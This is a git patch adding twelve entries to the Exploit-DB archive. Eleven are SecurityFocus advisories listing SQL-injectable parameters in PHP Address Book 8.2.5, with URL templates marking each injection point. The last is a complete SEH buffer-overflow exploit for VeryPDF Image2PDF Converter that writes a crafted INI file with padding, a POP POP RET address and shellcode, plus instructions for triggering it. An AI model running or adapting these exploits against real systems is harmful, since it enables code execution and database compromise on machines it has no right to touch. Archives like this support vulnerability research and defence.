From 822237ba4d0c34aa83ffe6c8e763ed497810e72d Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 10 Oct 2015 05:03:14 +0000
Subject: [PATCH] DB: 2015-10-10

12 new exploits
---
 files.csv                        | 12 +++++++
 platforms/php/webapps/38425.txt  |  9 +++++
 platforms/php/webapps/38426.txt  |  9 +++++
 platforms/php/webapps/38427.txt  |  9 +++++
 platforms/php/webapps/38428.txt  |  9 +++++
 platforms/php/webapps/38429.txt  |  9 +++++
 platforms/php/webapps/38430.txt  |  9 +++++
 platforms/php/webapps/38431.txt  |  9 +++++
 platforms/php/webapps/38432.txt  |  9 +++++
 platforms/php/webapps/38433.txt  |  9 +++++
 platforms/php/webapps/38434.txt  |  9 +++++
 platforms/php/webapps/38435.txt  |  9 +++++
 platforms/windows/local/38423.py | 60 ++++++++++++++++++++++++++++++++
 13 files changed, 171 insertions(+)
 create mode 100755 platforms/php/webapps/38425.txt
 create mode 100755 platforms/php/webapps/38426.txt
 create mode 100755 platforms/php/webapps/38427.txt
 create mode 100755 platforms/php/webapps/38428.txt
 create mode 100755 platforms/php/webapps/38429.txt
 create mode 100755 platforms/php/webapps/38430.txt
 create mode 100755 platforms/php/webapps/38431.txt
 create mode 100755 platforms/php/webapps/38432.txt
 create mode 100755 platforms/php/webapps/38433.txt
 create mode 100755 platforms/php/webapps/38434.txt
 create mode 100755 platforms/php/webapps/38435.txt
 create mode 100755 platforms/windows/local/38423.py

diff --git a/files.csv b/files.csv
index ae7b50a44..ca40c5d2a 100755
--- a/files.csv
+++ b/files.csv
@@ -34705,3 +34705,15 @@ id,file,description,date,author,platform,type,port
 38420,platforms/multiple/dos/38420.txt,"Google Chrome Cookie Verification Denial of Service Vulnerability",2013-04-04,anonymous,multiple,dos,0
 38421,platforms/linux/dos/38421.txt,"Apache Subversion 1.6.x 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability",2013-04-05,anonymous,linux,dos,0
 38422,platforms/linux/dos/38422.txt,"Apache Subversion Remote Denial of Service Vulnerability",2013-04-05,"Greg McMullin",linux,dos,0
+38423,platforms/windows/local/38423.py,"VeryPDF Image2PDF Converter SEH Buffer Overflow",2015-10-08,"Robbie Corley",windows,local,0
+38425,platforms/php/webapps/38425.txt,"PHP Address Book /addressbook/register/delete_user.php id Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
+38426,platforms/php/webapps/38426.txt,"PHP Address Book /addressbook/register/edit_user.php id Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
+38427,platforms/php/webapps/38427.txt,"PHP Address Book /addressbook/register/edit_user_save.php Multiple Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
+38428,platforms/php/webapps/38428.txt,"PHP Address Book /addressbook/register/linktick.php site Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
+38429,platforms/php/webapps/38429.txt,"PHP Address Book /addressbook/register/reset_password.php Multiple Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
+38430,platforms/php/webapps/38430.txt,"PHP Address Book /addressbook/register/reset_password_save.php Multiple Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
+38431,platforms/php/webapps/38431.txt,"PHP Address Book /addressbook/register/router.php BasicLogin Cookie Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
+38432,platforms/php/webapps/38432.txt,"PHP Address Book /addressbook/register/traffic.php var Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
+38433,platforms/php/webapps/38433.txt,"PHP Address Book /addressbook/register/user_add_save.php email Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
+38434,platforms/php/webapps/38434.txt,"PHP Address Book /addressbook/register/checklogin.php username Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
+38435,platforms/php/webapps/38435.txt,"PHP Address Book /addressbook/register/admin_index.php q Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
diff --git a/platforms/php/webapps/38425.txt b/platforms/php/webapps/38425.txt
new file mode 100755
index 000000000..0c84d2beb
--- /dev/null
+++ b/platforms/php/webapps/38425.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58911/info
+
+PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/addressbook/register/delete_user.php?id={insert} 
\ No newline at end of file
diff --git a/platforms/php/webapps/38426.txt b/platforms/php/webapps/38426.txt
new file mode 100755
index 000000000..7ddbc7dbf
--- /dev/null
+++ b/platforms/php/webapps/38426.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58911/info
+ 
+PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+ 
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/addressbook/register/edit_user.php?id={insert} 
\ No newline at end of file
diff --git a/platforms/php/webapps/38427.txt b/platforms/php/webapps/38427.txt
new file mode 100755
index 000000000..27e237c77
--- /dev/null
+++ b/platforms/php/webapps/38427.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58911/info
+  
+PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+  
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+  
+PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/addressbook/register/edit_user_save.php?id={insert}&lastname={insert}&firstname={insert}&phone={insert}&email={insert}&permissions={insert}&notes={insert} 
\ No newline at end of file
diff --git a/platforms/php/webapps/38428.txt b/platforms/php/webapps/38428.txt
new file mode 100755
index 000000000..7d80431bd
--- /dev/null
+++ b/platforms/php/webapps/38428.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58911/info
+   
+PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+   
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+   
+PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/addressbook/register/linktick.php?site={insert} 
\ No newline at end of file
diff --git a/platforms/php/webapps/38429.txt b/platforms/php/webapps/38429.txt
new file mode 100755
index 000000000..04e69c73f
--- /dev/null
+++ b/platforms/php/webapps/38429.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58911/info
+    
+PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+    
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+    
+PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/addressbook/register/reset_password.php?email={insert}&password={insert} 
\ No newline at end of file
diff --git a/platforms/php/webapps/38430.txt b/platforms/php/webapps/38430.txt
new file mode 100755
index 000000000..04647b4f2
--- /dev/null
+++ b/platforms/php/webapps/38430.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58911/info
+     
+PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+     
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+     
+PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/addressbook/register/reset_password_save.php?username={insert}&password=&password_confirm=&password_hint={insert}&email={insert} 
\ No newline at end of file
diff --git a/platforms/php/webapps/38431.txt b/platforms/php/webapps/38431.txt
new file mode 100755
index 000000000..743a7e8b5
--- /dev/null
+++ b/platforms/php/webapps/38431.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58911/info
+      
+PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+      
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+      
+PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/addressbook/register/router.php COOKIE var BasicLogin 
\ No newline at end of file
diff --git a/platforms/php/webapps/38432.txt b/platforms/php/webapps/38432.txt
new file mode 100755
index 000000000..3db6313df
--- /dev/null
+++ b/platforms/php/webapps/38432.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58911/info
+       
+PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+       
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+       
+PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/addressbook/register/traffic.php?var={insert} 
\ No newline at end of file
diff --git a/platforms/php/webapps/38433.txt b/platforms/php/webapps/38433.txt
new file mode 100755
index 000000000..4f0f4b437
--- /dev/null
+++ b/platforms/php/webapps/38433.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58911/info
+        
+PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+        
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+        
+PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/addressbook/register/user_add_save.php POST var email 
\ No newline at end of file
diff --git a/platforms/php/webapps/38434.txt b/platforms/php/webapps/38434.txt
new file mode 100755
index 000000000..64de207d0
--- /dev/null
+++ b/platforms/php/webapps/38434.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58911/info
+         
+PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+         
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+         
+PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/addressbook/register/checklogin.php?username={insert}&password=pass 
\ No newline at end of file
diff --git a/platforms/php/webapps/38435.txt b/platforms/php/webapps/38435.txt
new file mode 100755
index 000000000..521734c72
--- /dev/null
+++ b/platforms/php/webapps/38435.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58911/info
+          
+PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+          
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+          
+PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/addressbook/register/admin_index.php?q={insert} 
\ No newline at end of file
diff --git a/platforms/windows/local/38423.py b/platforms/windows/local/38423.py
new file mode 100755
index 000000000..bdb483009
--- /dev/null
+++ b/platforms/windows/local/38423.py
@@ -0,0 +1,60 @@
+#********************************************************************************************************************************************
+# 
+# Exploit Title: VeryPDF Image2PDF Converter SEH Buffer Overflow
+# Date: 10-7-2015
+# Software Link: http://www.verypdf.com/tif2pdf/img2pdf.exe
+# Exploit Author: Robbie Corley
+# Platform Tested: Windows 7 x64
+# Contact: c0d3rc0rl3y@gmail.com
+# Website: 
+# CVE: 
+# Category: Local Exploit
+#
+# Description:
+# The title parameter contained within the c:\windows\Image2PDF.INI is vulnerable to a buffer overflow.  
+# This can be exploited using SEH overwrite.
+# 
+# Instructions:  
+# 1. Run this sploit as-is.  This will generate the new .ini file and place it in c:\windows, overwriting the existing file
+# 2. Run the Image2PDF program, hit [try], file --> add files
+# 3. Open any .tif file.  Here's the location of one that comes with the installation: C:\Program Files (x86)\VeryPDF Image2PDF v3.2\trial.tif
+# 4. Hit 'Make PDF', type in anything for the name of the pdf-to-be, and be greeted with your executed shellcode ;)
+#**********************************************************************************************************************************************
+
+#standard messagebox shellcode.  
+$shellcode =
+"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
+"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
+"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
+"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
+"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
+"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74".
+"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe".
+"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
+
+$padding="\x90" x 2985;
+$seh=pack('V',0x6E4B3045); #STANDARD POP POP RET
+$morepadding="\x90" x 1096;
+
+open(myfile,'>c:\\windows\\Image2PDF.INI'); #generate the dummy DWF file
+
+#.ini file header & shellcode
+print myfile "[SaveMode]
+m_iMakePDFMode=0
+m_iSaveMode=0
+m_szFilenameORPath=
+m_iDestinationMode=0
+m_bAscFilename=0
+m_strFileNumber=0001
+[BaseSettingDlg]
+m_bCheckDespeckle=0
+m_bCheckSkewCorrect=0
+m_bCheckView=0
+m_szDPI=default
+m_bCheckBWImage=1
+[SetPDFInfo]
+m_szAuthor=
+m_szSubject=
+m_szTitle=".$padding."\xEB\x06\x90\x90".$seh.$shellcode.$morepadding; 
+
+close (myfile); #close the file
\ No newline at end of file